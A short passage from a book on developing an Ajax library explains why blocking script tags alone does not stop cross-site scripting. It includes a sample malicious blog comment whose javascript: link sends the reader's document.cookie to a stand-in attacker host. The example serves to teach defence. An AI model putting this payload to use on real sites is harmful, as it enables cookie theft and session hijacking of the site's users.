314 Part II: Developing an Ajax Library^
Addressing XSS
Before you start disabling JavaScript in your browser, understand that the XSS security
problem isn’t really the fault of JavaScript; instead, the creator of a Web application is to
blame here. The previous example should not allow a user to submit script in a message
post. You might be tempted to start addressing this by simply forbidding the inclusion of
the <script> tag in posts. That will defeat a few less sophisticated intruders, but there are
many other ways to include script. For example, imagine if links are allowed, the hacker
could make a post that invokes a javascript: pseudo-URLs.I really disagree with this post, please take a look <a href="javascript: var
cookieMonster = new Image(); cookieMonster.src='http://www.evilsite.com/
cookiecollecter.php?stolencookie='+escape(document.cookie);" />at my response</a>FIGURE 7-9 Post your own evil comments on this unsecured blog.